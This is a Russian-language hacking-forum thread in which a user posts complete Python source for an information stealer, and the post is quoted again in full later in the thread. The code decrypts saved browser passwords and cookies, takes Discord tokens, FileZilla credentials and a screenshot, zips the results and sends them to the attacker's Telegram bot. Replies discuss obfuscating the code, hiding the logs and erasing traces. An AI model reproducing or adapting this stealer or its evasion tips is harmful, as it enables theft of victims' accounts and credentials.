• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Python Пишем свой стилер на python

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
Функционал:
  • Стиллинг сохранённых паролей и куков из браузеров(Google Chrome, Chromium, Amigo, Opera, Yandex Browser)
  • Скриншот рабочего стола
  • Стиллинг токена Discord
  • Стиллинг сессий FileZilla
  • Логи отправляются в Telegram

Приступим!


Создаём бота у @BotFather копируем токен бота, идём в лс к своему боту и начинаем диалог, далее переходим к этому боту @userinfobot и узнаём свой chat id.

С ботом закончили, открываем cmd и пишем следующие команды:
pip install pyTelegramBotAPI pip install win32crypt pip install telebot

Теперь открываем IDE и начинаем кодить:
Импортируем нужные библиотеки:
Python:
import os
import sqlite3
import win32crypt
import telebot
import shutil
import requests
import zipfile
from PIL import ImageGrab
Python:
Теперь объявляем переменную username, которая содержит имя пользователя:
Python:
username = os.getlogin()
Переменные для работы с ботом телеграм:
Python:
token = 'ВАШ_ТОКЕН_ОТ_БОТА'
bot = telebot.TeleBot(token)

Сейчас будем воровать пароли от хрома(комментарии отмечены # / #комментарий):
Python:
def Chrome(): # Создаём функцию
   text = 'Stealer coded by Dark $ide\n\n\nPasswords Chrome:' + '\n' # Добавим авторов стиллера)
   text += 'URL | LOGIN | PASSWORD' + '\n' # Объясняем что лог идём в формате Ссылка | Логин | Пароль
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): # Ищем файл Login Data В котором содержатся все пароли
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')

       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') # Начинаем работать с sqlite базой
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins') # Вытаскиваем Ссылку, логин, пароль
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode() # расшифровываем данные
           login = result[1]
           url = result[0]
           if password != '':
               text += url + ' | ' + login + ' | ' + password + '\n' # Добавляем данный в переменную
   return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+") #Сохраняем данныем в txt файл google_pass
file.write(str(Chrome()) + '\n')
file.close()

Теперь воруем куки из хрома:
Python:
def Chrome_cockie():
   textc = 'Stealer coded by Dark $ide\n\n\nCookies Chrome:' + '\n'
   textc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+") #данные
file.write(str(Chrome_cockie()) + '\n')
file.close()

Воруем куки из Yandex Браузера:
Python:
def Yandex():
   texty = 'Stealer coded by Dark $ide\n\n\nYANDEX Cookies:' + '\n'
   texty += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           texty += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return texty
file = open(os.getenv("APPDATA") + '\\yandex_cookies.txt', "w+")#данные
file.write(str(Yandex()) + '\n')
file.close()

Пароли браузеров на основе Chromium:
Python:
def chromium():
   textch = '\n' + 'Stealer coded by Dark $ide\n\n\nChromium Passwords:' + '\n'
   textch += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               textch += url + ' | ' + login + ' | ' + password + '\n'
               return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")#данные
file.write(str(chromium()) + '\n')
file.close()

Куки браузеров на основе Chromium:
Python:
def chromiumc():
   textchc = '' 
   textchc += '\n' + 'Stealer coded by Dark $ide\n\n\nChromium Cookies:' + '\n'
   textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")#данные
file.write(str(chromiumc()) + '\n')
file.close()

Пароли Amigo:
Python:
def Amigo():
   textam = 'Passwords Amigo:' + '\n'
   textam += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")#данные
file.write(str(Amigo()) + '\n')
file.close()

Куки Amigo:
Python:
def Amigo_c():
   textamc = 'Cookies Amigo:' + '\n'
   textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textamc

file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")#данные
file.write(str(Amigo_c()) + '\n')
file.close()

Воруем пароли с Оперы:
Python:
def Opera():
   texto = 'Passwords Opera:' + '\n'
   texto += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
       shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               texto += url + ' | ' + login + ' | ' + password + '\n'

file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")#данные
file.write(str(Opera()) + '\n')
file.close()

Куки Оперы:
Python:
def Opera_c():
    textoc = '\n' + 'Cookies Opera:' + '\n'
    textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
    if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
      shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      cursor = conn.cursor()
      cursor.execute("SELECT * from cookies")
      for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
    return textoc

file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")#данные
file.write(str(Opera_c()) + '\n')
file.close()

Теперь будем воровать DISCORD токен:
Python:
def discord_token():
   if os.path.isfile(os.getenv("APPDATA") + '/discord/Local Storage/https_discordapp.com_0.localstorage') is True:
       token = ''
       conn = sqlite3.connect(os.getenv("APPDATA") + "/discord/Local Storage/https_discordapp.com_0.localstorage")
       cursor = conn.cursor()
       for row in cursor.execute("SELECT key, value FROM ItemTable WHERE key='token'"):
           token = row[1].decode("utf-16")
       conn.close()
       if token != '':
           return token
       else:
           return 'Discord exists, but not logged in'
   else:
       return 'Not found'
ds_token = discord_token()
ds_token += 'Discord token:' + '\n' + discord_token() + '\n' + '\n'

file = open(os.getenv("APPDATA") + '\\discord_token.txt', "w+")#данные
file.write(str(discord_token()) + '\n')
file.close()

Воруем Сессии FileZilla:
Python:
def filezilla():
   try:
       data = ''
       if os.path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
           root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()

           for i in range(len(root[0])):
               host = root[0][i][0].text
               port = root[0][i][1].text
               user = root[0][i][4].text
               password = base64.b64decode(root[0][i][5].text).decode('utf-8')
               data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
           return data
       else:
           return 'Not found'
   except Exception:
       return 'Error'

textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'

file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")#данные
file.write(str(filezilla()) + '\n')
file.close()

Делаем скриншот рабочего стола:
Python:
screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')#данные

Теперь сохраняем все данные в архив:
Python:
zname=r'D:\LOG.zip' #создаем переменную - название и местоположение файла
newzip=zipfile.ZipFile(zname,'w') #создаем архив
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\yandex_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\chromium.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\chromium_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\amigo_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\amigo_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\discord_token.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\filezilla.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\sreenshot.jpg')
newzip.close() #закрываем архив

Теперь добавим переменную doc:
Python:
doc = open("D:\LOG.zip", 'rb')

Отправляем сообщение в телеграм бота:
Python:
bot.send_document(ВАШ CHATID, doc)

На этом всё, думаю если будет время добавлю ещё плюшек.

Скачать исходники можете тут
 

Fathak

Участник
Сообщения
68
Реакции
33
0 руб.
Cтатья хорошая но реализовать бы подобное на C++ так как питон сложнее защитить нежели C++ да и вес готового файла больше.
[automerge]1552438721[/automerge]
Может кто подскажет как зашифровать строки в коде на питон хотя-бы с помощью xor и сделать обфускацию кода?
[automerge]1552438823[/automerge]
Теперь сохраняем все данные в архив:
Не плохо было бы еще пароль задать для архива типа "xssdfhyu7y6543234567ikjuhgf"
 
Последнее редактирование:

lil_rain

Новичок
Сообщения
3
Реакции
0
0 руб.
Telegram
def discord_token(): if os.path.isfile(os.getenv("APPDATA") + '/discord/Local Storage/https_discordapp.com_0.localstorage') is True: token = '' conn = sqlite3.connect(os.getenv("APPDATA") + "/discord/Local Storage/https_discordapp.com_0.localstorage") cursor = conn.cursor() for row in cursor.execute("SELECT key, value FROM ItemTable WHERE key='token'"): token = row[1].decode("utf-16") conn.close()
С ds странная хуйня. Допустим у меня этих файлов(в папке Local Storage) нет. И ещё у двух знакомых, которые юзают ds тоже нет.Ток у одного из 4 человек есть.
И смысл брать токен? Некоторые стилаки стилят файл и потом просто его подменяешь у себя и всё
 

lil_rain

Новичок
Сообщения
3
Реакции
0
0 руб.
Telegram
сделать обфускацию кода?
На счёт шифрования хз, но обфускация изи. В гугл вбивай. Есть и онлайн обфускатор, так и специальные библиотеки.
Не плохо было бы еще пароль задать для архива типа "xssdfhyu7y6543234567ikjuhgf"
Дак а смысл от этого? Если чтоб юзер пк случайно не нашёл свой лог, следует как минимум, сделать его скрытым файлом(как и данные, которые ещё стилак собирает до архивации), ну и естественно, потом ещё следы за собой подчистить
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
UP! Накиньте идей для улучшения стиллера, годные идеи рассмотрю, и добавлю новые фичи.
 

AtlantTan

Новичок
Сообщения
6
Реакции
0
0 руб.
Функционал:
  • Стиллинг сохранённых паролей и куков из браузеров(Google Chrome, Chromium, Amigo, Opera, Yandex Browser)
  • Скриншот рабочего стола
  • Стиллинг токена Discord
  • Стиллинг сессий FileZilla
  • Логи отправляются в Telegram

Приступим!


Создаём бота у @BotFather копируем токен бота, идём в лс к своему боту и начинаем диалог, далее переходим к этому боту @userinfobot и узнаём свой chat id.

С ботом закончили, открываем cmd и пишем следующие команды:
pip install pyTelegramBotAPI pip install win32crypt pip install telebot

Теперь открываем IDE и начинаем кодить:
Импортируем нужные библиотеки:
Python:
import os
import sqlite3
import win32crypt
import telebot
import shutil
import requests
import zipfile
from PIL import ImageGrab
Python:
Теперь объявляем переменную username, которая содержит имя пользователя:
Python:
username = os.getlogin()
Переменные для работы с ботом телеграм:
Python:
token = 'ВАШ_ТОКЕН_ОТ_БОТА'
bot = telebot.TeleBot(token)

Сейчас будем воровать пароли от хрома(комментарии отмечены # / #комментарий):
Python:
def Chrome(): # Создаём функцию
   text = 'Stealer coded by Dark $ide\n\n\nPasswords Chrome:' + '\n' # Добавим авторов стиллера)
   text += 'URL | LOGIN | PASSWORD' + '\n' # Объясняем что лог идём в формате Ссылка | Логин | Пароль
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): # Ищем файл Login Data В котором содержатся все пароли
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')

       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') # Начинаем работать с sqlite базой
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins') # Вытаскиваем Ссылку, логин, пароль
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode() # расшифровываем данные
           login = result[1]
           url = result[0]
           if password != '':
               text += url + ' | ' + login + ' | ' + password + '\n' # Добавляем данный в переменную
   return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+") #Сохраняем данныем в txt файл google_pass
file.write(str(Chrome()) + '\n')
file.close()

Теперь воруем куки из хрома:
Python:
def Chrome_cockie():
   textc = 'Stealer coded by Dark $ide\n\n\nCookies Chrome:' + '\n'
   textc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+") #данные
file.write(str(Chrome_cockie()) + '\n')
file.close()

Воруем куки из Yandex Браузера:
Python:
def Yandex():
   texty = 'Stealer coded by Dark $ide\n\n\nYANDEX Cookies:' + '\n'
   texty += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           texty += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return texty
file = open(os.getenv("APPDATA") + '\\yandex_cookies.txt', "w+")#данные
file.write(str(Yandex()) + '\n')
file.close()

Пароли браузеров на основе Chromium:
Python:
def chromium():
   textch = '\n' + 'Stealer coded by Dark $ide\n\n\nChromium Passwords:' + '\n'
   textch += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               textch += url + ' | ' + login + ' | ' + password + '\n'
               return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")#данные
file.write(str(chromium()) + '\n')
file.close()

Куки браузеров на основе Chromium:
Python:
def chromiumc():
   textchc = ''
   textchc += '\n' + 'Stealer coded by Dark $ide\n\n\nChromium Cookies:' + '\n'
   textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")#данные
file.write(str(chromiumc()) + '\n')
file.close()

Пароли Amigo:
Python:
def Amigo():
   textam = 'Passwords Amigo:' + '\n'
   textam += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")#данные
file.write(str(Amigo()) + '\n')
file.close()

Куки Amigo:
Python:
def Amigo_c():
   textamc = 'Cookies Amigo:' + '\n'
   textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
       cursor = conn.cursor()
       cursor.execute("SELECT * from cookies")
       for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
   return textamc

file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")#данные
file.write(str(Amigo_c()) + '\n')
file.close()

Воруем пароли с Оперы:
Python:
def Opera():
   texto = 'Passwords Opera:' + '\n'
   texto += 'URL | LOGIN | PASSWORD' + '\n'
   if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
       shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins')
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode()
           login = result[1]
           url = result[0]
           if password != '':
               texto += url + ' | ' + login + ' | ' + password + '\n'

file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")#данные
file.write(str(Opera()) + '\n')
file.close()

Куки Оперы:
Python:
def Opera_c():
    textoc = '\n' + 'Cookies Opera:' + '\n'
    textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
    if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
      shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
      cursor = conn.cursor()
      cursor.execute("SELECT * from cookies")
      for result in cursor.fetchall():
           cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
           name = result[2]
           url = result[1]
           textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
    return textoc

file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")#данные
file.write(str(Opera_c()) + '\n')
file.close()

Теперь будем воровать DISCORD токен:
Python:
def discord_token():
   if os.path.isfile(os.getenv("APPDATA") + '/discord/Local Storage/https_discordapp.com_0.localstorage') is True:
       token = ''
       conn = sqlite3.connect(os.getenv("APPDATA") + "/discord/Local Storage/https_discordapp.com_0.localstorage")
       cursor = conn.cursor()
       for row in cursor.execute("SELECT key, value FROM ItemTable WHERE key='token'"):
           token = row[1].decode("utf-16")
       conn.close()
       if token != '':
           return token
       else:
           return 'Discord exists, but not logged in'
   else:
       return 'Not found'
ds_token = discord_token()
ds_token += 'Discord token:' + '\n' + discord_token() + '\n' + '\n'

file = open(os.getenv("APPDATA") + '\\discord_token.txt', "w+")#данные
file.write(str(discord_token()) + '\n')
file.close()

Воруем Сессии FileZilla:
Python:
def filezilla():
   try:
       data = ''
       if os.path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
           root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()

           for i in range(len(root[0])):
               host = root[0][i][0].text
               port = root[0][i][1].text
               user = root[0][i][4].text
               password = base64.b64decode(root[0][i][5].text).decode('utf-8')
               data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
           return data
       else:
           return 'Not found'
   except Exception:
       return 'Error'

textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'

file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")#данные
file.write(str(filezilla()) + '\n')
file.close()

Делаем скриншот рабочего стола:
Python:
screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')#данные

Теперь сохраняем все данные в архив:
Python:
zname=r'D:\LOG.zip' #создаем переменную - название и местоположение файла
newzip=zipfile.ZipFile(zname,'w') #создаем архив
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\google_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\yandex_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\chromium.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\chromium_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\amigo_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\amigo_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_pass.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\opera_cookies.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\discord_token.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\filezilla.txt')
newzip.write(r'C:\\Users\\' + username + '\\AppData\\Roaming\\sreenshot.jpg')
newzip.close() #закрываем архив

Теперь добавим переменную doc:
Python:
doc = open("D:\LOG.zip", 'rb')

Отправляем сообщение в телеграм бота:
Python:
bot.send_document(ВАШ CHATID, doc)

На этом всё, думаю если будет время добавлю ещё плюшек.

Скачать исходники можете тут
Не смог разобраться и собрать все это воедино. Нужно с папки ya login data достать забытый пароль... его не надо ни куда отправлять по почте или телеграмму, ни архивировать... просто показать мне, чтоб я его записал и сохранил.
мне необходимо просто его достать и сохранить.
Можете подсказать код или, просто направить на правильный путь действий.
 

AtlantTan

Новичок
Сообщения
6
Реакции
0
0 руб.
import os
import sqlite3
import win32crypt
import telebot
import shutil
import requests
import zipfile
import zipfile

username = os.getlogin()
def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
